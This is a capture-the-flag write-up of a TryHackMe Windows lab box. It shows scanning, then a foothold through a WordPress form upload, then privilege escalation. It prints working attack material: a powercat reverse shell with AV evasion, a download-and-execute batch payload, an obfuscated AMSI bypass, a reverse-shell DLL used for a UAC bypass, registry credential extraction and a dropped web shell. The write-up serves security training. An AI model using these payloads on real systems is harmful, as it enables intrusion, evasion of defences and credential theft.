# AVenger {% embed url="" %} The following post by 0xb0b is licensed under [CC BY 4.0

](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1) ## Recon By scanning our target with Nmap, we can discover several open ports. Notable services include HTTP on port 80, HTTPS on port 443, Microsoft RPC on port 135, NetBIOS on port 139, SMB on port 445, RDP on port 3389, WinRM on port 5985, dynamic RPC on port 47001, and additional dynamic RPC ports ranging from 49664 to 49669, as well as specific ports 49676 and 49677.

For a more detailed scan, we specify a service and default script scan on the initially found ports. ```bash ┌──(0xb0b㉿kali)-[~/Documents/tryhackme/avenger] └─$ nmap -sT -sV -sC -Pn -p 80,135,139,443,445,3389,5985,47001,49664-49669,49676,49677 avenger.thm -T5 Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-25 10:37 EST Nmap scan report for avenger.thm (10.10.41.159) Host is up (0.036s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28) |_http-title: Index of / | http-ls: Volume / | SIZE TIME FILENAME | 3.5K 2022-06-15 16:07 applications.html | 177 2022-06-15 16:07 bitnami.css | - 2023-04-06 09:24 dashboard/ | 30K 2015-07-16 15:32 favicon.ico | - 2023-06-27 09:26 gift/ | - 2023-06-27 09:04 img/ | 751 2022-06-15 16:07 img/module_table_bottom.png | 337 2022-06-15 16:07 img/module_table_top.png | - 2023-06-28 14:39 xampp/ |_ | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28) |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=localhost | Not valid before: 2009-11-10T23:48:47 |_Not valid after: 2019-11-08T23:48:47 | http-methods: |_ Potentially risky methods: TRACE |_http-title: Index of / | tls-alpn: |_ http/1.1 | http-ls: Volume / | SIZE TIME FILENAME | 3.5K 2022-06-15 16:07 applications.html | 177 2022-06-15 16:07 bitnami.css | - 2023-04-06 09:24 dashboard/ | 30K 2015-07-16 15:32 favicon.ico | - 2023-06-27 09:26 gift/ | - 2023-06-27 09:04 img/ | 751 2022-06-15 16:07 img/module_table_bottom.png | 337 2022-06-15 16:07 img/module_table_top.png | - 2023-06-28 14:39 xampp/ |_ |_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 445/tcp open microsoft-ds? 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2023-11-25T15:38:24+00:00; -17s from scanner time. | rdp-ntlm-info: | Target_Name: GIFT | NetBIOS_Domain_Name: GIFT | NetBIOS_Computer_Name: GIFT | DNS_Domain_Name: gift | DNS_Computer_Name: gift | Product_Version: 10.0.17763 |_ System_Time: 2023-11-25T15:38:16+00:00 | ssl-cert: Subject: commonName=gift | Not valid before: 2023-06-29T08:09:48 |_Not valid after: 2023-12-29T08:09:48 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49676/tcp open msrpc Microsoft Windows RPC 49677/tcp open msrpc Microsoft Windows RPC Service Info: Hosts: localhost, www.example.com; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -17s, deviation: 0s, median: -17s | smb2-time: | date: 2023-11-25T15:38:19 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 64.12 seconds ``` After finishing the Nmap scan, we run a Gobuster scan to enumerate all possible files and directories on the web server running at ports 80 and 443. We see that `phpmyadmin` is running, and the CMS WordPress is present.

During manual enumeration, `/gift` also turned out to be a WordPress page. The domain `avenger.tryhackme` also became clear from the sources. Next, we run the wpscan on the WordPress page `/gift`.

At first glance, we see a very low-hanging fruit. Forminator version 1.24.1 is in use. Which is also affected by the vulnerability of unauthenticated remote command execution in version 1.24.6 (CVE-2023-4596). This vulnerability would allow us to upload a reverse shell, which could then be accessed at `/wp-content/uploads///shell.php` to execute it.

There is also a forminator form on the `/gift` page. It seems perfect.

Checking the sources of the form, it is indeed a forminator form.

After a short amount of research, two exploits can be identified. The one from `exploit.db` does not appear to be directly transparent and clear. We first use the automated exploit from E1A, but quickly realize that we will fail. We are able to upload files with the exploit, but cannot find them in `/wp-content/uploads/2023/11`. **Let's ignore this vulnerability and move on**. {% embed url="" %} {% embed url="" %} ## Foothold We stay at the form and try to upload an arbitrary image.

After uploading it, we'll get a decent hint. The message states that the team is delighted to review every message carefully. So let us assume that someone or something is opening or executing whats uploaded.

Let's make a quick sanity check using an HTML file containing an image whose source points to our web server. A quick shoutout to amine04. Without the assumption and testing using an HTML file like amine04 suggested, I wouldn't be able to come this far. \ Like the box states *"Think outside the box, unleash your inner prankster, and find unconventional solutions to outwit your opponents."* ```html

```

After a really short duration, the file seems to have been opened by someone, and we see the picture gets loaded from our server.

With that in mind and the description of the room that there is Antivirus (AV) is enabled, we look up techniques to upload reverse shell evading AV. For this, there is a really good resource referring to that topic: {% embed url="" %} The idea is to use powercat to create a reverse shell whose content is stored base64-encoded in a text file. The content of the file is downloaded to the target computer and executed using a batch file. The batch file is placed and executed by uploading it via the form. > Powercat () is a simple network utility used to perform low-level network communication operations. The tool is an implementation of the well-known Netcat in PowerShell. > > To evade the Windows Defender antivirus software, we can encode reverse shell payload with Powercat. Powercat has a good feature to encode a command to Hexadecimal Array. This way, some of the basic security features can be bypassed. The following version of powercat was used: {% embed url="" %} To generate the powercat shell on our attacker machine, you can make use of the following commands: ```bash ┌──(0xb0b㉿kali)-[~/Documents/tryhackme/avenger] └─$ LHOST=10.8.211.1 ┌──(0xb0b㉿kali)-[~/Documents/tryhackme/avenger] └─$ LPORT=49731 ┌──(0xb0b㉿kali)-[~/Documents/tryhackme/avenger] └─$ rshell=shell-49731.txt ┌──(0xb0b㉿kali)-[~/Documents/tryhackme/avenger] └─$ pwsh -c "iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c $LHOST -p $LPORT -e cmd.exe -ge" > /home/0xb0b/Documents/tryhackme/avenger/$rshell ```

An excerpt of the generated, encoded reverse shell

Create the batch file to download and execute the encoded powercat reverse shell using PowerShell. This batch file will be executed by someone or something after uploading it. ```bash START /B powershell -c $code=(New-Object System.Net.Webclient).DownloadString('http://10.8.211.1:9000/shell-49731.txt');iex 'powershell -E $code' ```

After generating the shell, a listener on `49371` is created on the attacker machine. We upload the batch and see after a short duration that the text file containing the shell gets downloaded.

The reverse shell connects, and we are the user `hugo`.

After our first look up, we head to the Desktop of `hugo` where the first flag can be found.

## Privilege Escalation During the enumeration process, we see that `hugo` is part of the administrator groups - nice. Lets check if UAC is present. Maybe we are able to bypass it. As Microsoft states, User Account Control is a security feature that requires a user's consent before running applications with administrator privileges. > User Account Control (UAC) is a key part of Windows security. UAC reduces the risk of malware by limiting the ability of malicious code to execute with administrator privileges. > > With UAC, each application that requires the administrator access token must prompt the end user for consent. The only exception is the relationship that exists between parent and child processes. Child processes inherit the user's access token from the parent process. Both the parent and child processes, however, must have the same integrity level.

We query if UAC is enabled. The settings are at level**`5`**(**default)**. It will ask the administrator to confirm to run non Windows binaries with high privileges. `REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin`

First we make use of the encoded AMSI bypass of Fabian Mosh: ``` [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true) ``` Next, we download the windows binary `ncat.exe` on the target machine using curl. ```bash curl http://10.8.211.1:9000/ncat.exe -o C:\Users\hugo\Desktop\ncat.exe ``` To bypass the UAC we make use of Technique 2 of Morphs Blog. It makes use of abusing trusted folders, to hijack DLLs of elevated binaries. A quick guide can be found at . A more detailed explanation can be found here . First we create a DLL which executes ncat to establish a reverse shell. {% code title="custom.cpp" lineNumbers="true" %} ```cpp #include void exec_custom() { WinExec("c:\\users\\hugo\\Desktop\\ncat.exe -e cmd.exe 10.8.211.1 49732", 1); } bool APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch(ul_reason_for_call) { case DLL_PROCESS_ATTACH: exec_custom(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return true; } ``` {% endcode %} We compile it using `x86_64-w64-mingw32-gcc`. ```bash ┌──(0xb0b㉿kali)-[~/Documents/tryhackme/avenger] └─$ x86_64-w64-mingw32-gcc -shared -o Secur32.dll custom.cpp ```

> If you succeed in making folders with trailing slashes, Windows will interpret them as if the trailing slash was not there, however as you created the folder, you have full control over said folder. > > So, as a regular user, you now created a folder Windows considers “trusted”, but you have full access on this folder, making you able to write whatever you want in there and execute it under auto elevation. {% embed url="" %} After providing the machine with a version of ncat and having the DLL prepared, we create the folders with trailing spaces, tricking windows. We place the elevated executable `computerdefaults.exe` in there that is using the `Secur32.dll`. Next we download our custom `Secur32.dll` and place it also in `C:\Windows \System32\`. ```bash mkdir "C:\Windows \" mkdir "C:\Windows \System32\" copy "C:\Windows\System32\computerdefaults.exe" "C:\Windows \System32\computerdefaults.exe" curl http://10.8.211.1:9000/Secur32.dll -o "C:\Windows \System32\Secur32.dll" "C:\Windows \System32\computerdefaults.exe" ```

creating the folders and placing the computerdefaults.exe binary

downloading the custom dll and checking the contents of C:\Windows \System32\

After executing `"C:\Windows \System32\computerdefaults.exe"` our reverse shell connects, and we are able to access the root flag at `C:\Users\Administrator\Desktop`.

## Unintended Privilege Escalation I This was my initial way of escalating privileges. For some reason, the information gathered in this approach is only accessible while using a (powercat) reverse shell provided by a batch, as described here in the following. For some reason, it does not work with an HTA-Shell uploaded via the form. During the enumeration process, we see that `hugo` is part of the administrator groups - nice. We know that there is an open RDP port, so eventually we are able to retrieve the credentials of the user and use them to RDP into the machine. There, we could easily run stuff as administrator with being able to interact with the UAC.

To further enumerate the target on how to bypass the UAC or find other ways to escalate privileges, we want to make use of `PowerUp.ps1`. Since the target is still under AV protection, we try to bypass it. Especially the Antimalware Scan Interface (AMSI). AMSI is a Microsoft technology that enables applications to collaborate with antimalware products for real-time scanning of code and data in memory. It enhances security by allowing dynamic analysis of scripts and code executions to detect and prevent potential malware threats. Several attempts like downgrading PowerShell or using different payloads were made to bypass AMSI, like the example below shows.

A good resource regarding that AV evasion topic is the following: {% embed url="" %} Here we make use of the encoded AMSI bypass of Fabian Mosh: ```powershell [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true) ```

Other payloads can be found here: {% embed url="" %} After applying the bypass, the `PowerUp.ps1` can be downloaded from our web server. Having the `PowerUp.ps1` file on the machine, we import the PowerUp module and utilize the `Invoke-AllChecks`. The `Invoke-AllChecks` is a function that runs all the checks included in the module. The function outputs results of the checks in a useful format and offers us suggestions for where to look regarding privilege escalation. ```powershell (New-Object System.Net.Webclient).DownloadString('http://10.8.211.1:9000/PowerUp.ps1') > PowerUp.ps1 . .\Powerup.ps1 Invoke-AllChecks ``` The following version of `PowerUp.ps1` was used: {% embed url="" %}

With that, we are able to spot two findings. First, there is a hijackable path, which we were not able to abuse yet and discussed in Further Ideas. Secondly, we get the credentials for the user `hugo` stored in the registry. \ When autologon is turned on, the password is stored in the registry in plain text. The registry can be queried manually using `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"` {% embed url="" %}

With those credentials, we hit up Remmina to get a remote desktop connection as the user `hugo`, recalling the open port 3389. From there, we are able to run the PowerShell terminal as an administrator since the user is part of the administrator group. The UAC just has to be confirmed. With the administrator PowerShell spawned, we head directly to `C:\Users\Administrator\Desktop` to find the `root.txt` flag there.

## Unintended Privilege Escalation II Another working approach was found by amine04. We discussed our different approaches to gaining `root`, and I want to briefly showcase the approach. A web shell can be placed at `C:\xampp\htdocs`. The web server seems to be running as `NT Authority/System`. With that web shell, all files can be accessed. {% embed url="" %} Unfortunately, there is an error when running the following command to download the reverse shell. ```powershell (New-Object System.Net.WebClient).DownloadString('http://10.8.211.1:9000/p0wny-shell/shell.php') > shell.php ```

There might be an encoding error that leads to the PHP page not being evaluated correctly.

With cURL, we are able to download the shell correctly. ```bash curl http://10.8.211.1:9000/p0wny-shell/shell.php -o C:\xampp\htdocs\shell.php ```

Accessing the web shell at `http://avenger.tryhackme/shell.php` gives us then full access on the system.

## Further Ideas Another approach was discussed with 0day. Recalling the PowerUp Finding of Hijackable Path. A working exploit has not been found yet, but I am still trying. But referring to **Hijacking the Service DLL to get a SYSTEM Shell** a restart of the machine is required, which we are not able to do so.\ The following approach was introduced by 0day. The snippet below is a modified version of his testing malicious DLL to capture the contents of `C:\Users\Administrator\Desktop` of which was tested on a VM. {% code title="test.cs" lineNumbers="true" %} ```csharp using System; using System.IO; public class ListDesktopContents { static ListDesktopContents() { string desktopPath = "C:\\Users\\Administrator\\Desktop"; string outputFile = "C:\\temp\\desktop_contents.txt"; try { string[] files = Directory.GetFiles(desktopPath); string[] directories = Directory.GetDirectories(desktopPath); using (StreamWriter writer = new StreamWriter(outputFile, false)) { foreach (string file in files) { writer.WriteLine("File: " + file); // Read and write the contents of the file try { string fileContents = File.ReadAllText(file); writer.WriteLine("Contents: " + fileContents); } catch (Exception ex) { writer.WriteLine("Error reading file contents: " + ex.ToString()); } } foreach (string dir in directories) { writer.WriteLine("Directory: " + dir); } } } catch (Exception ex) { File.WriteAllText(outputFile, ex.ToString()); } } } ``` {% endcode %} Compile the custom DLL. ```bash ┌──(0xb0b㉿kali)-[~/Documents/tryhackme/avenger] └─$ mcs -target:library -out:RunCommand.dll test.cs ``` Use the Write-HijackDll CMDLet to place a Command into the vulnerable DLL. ```bash Write-HijackDll -OutputFile 'C:\Users\hugo\AppData\Local\Microsoft\WindowsApps\\wlbsctrl.dll' -Command 'C:\Users\hugo\Desktop\RunCommand.dll' ```